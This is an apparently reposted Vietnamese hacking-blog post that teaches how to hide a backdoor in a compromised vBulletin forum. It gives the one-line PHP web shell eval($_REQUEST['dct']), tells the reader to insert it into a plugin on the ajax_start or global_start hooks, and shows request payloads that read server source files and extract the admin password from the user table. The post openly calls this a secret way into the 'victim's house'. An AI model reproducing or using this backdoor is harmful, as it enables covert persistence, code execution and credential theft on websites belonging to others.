Khi bạn đã login vào được admincp của 1 forum vbb nào đó, bạn muốn để lại 1 “cửa sau” trên website này 1 cách kín đáo nhất ?
Okê, chỉ cần 1 dòng đơn giản:
eval($_REQUEST['dct']);
Đầu tiên bạn cần truy cập vào: Plugin & product manager => Plugin manager => Tìm đến 1 plugin bất kì => EDIT => chèn dòng trên vào vị trí hợp lý (Nếu không hiểu lắm về cấu trúc php thì bạn có thể chèn vào đầu hoặc cuối)
Bạn cần chú ý vào “HOOK” mà bạn chèn. Bạn nào hiểu phần này thì okê rồi. Còn nếu bạn nào chưa hiểu thì hãy chọn những kái nào có hook là: ajax_start => Sau khi chèn chỉ việc truy cập /forum_path/ajax.php?dct=(Code php) global_start (ko biết có nhớ lộn ko) => Sau khi chèn chỉ việc truy cập /forum_path/forum.php?dct=(Code php) — (Hoặc có thể run bất kì file php nào, vì chèn vào global mà) ……………..Blah blah……………..
Code php bạn có thể chèn truy vấn SQL, readfile…. Ví dụ ?dct=$duyk=readfile(‘includes/class_core.php’); echo $duyk; => view file class_core.php ?dct=$duyk=mysql_fetch_array(mysql_query(“select password from user where userid=1″)); echo $duyk['password']; ……………..
Với việc chèn “Cửa hậu” nhỏ gọn như vậy nhưng rất hiệu quả :D Bằng cách này chúng ta có 1 cửa cho riêng mình để vào “nhà” của victim 1 cách lén lút nhất.
Leech cho ae tham khảo nhé
Nguồn: DaiCa.info – DaiCa.net – Forum Newbie học hỏi ( Luôn tôn trọng bản quyền tác giả)
0 comments:
Post a Comment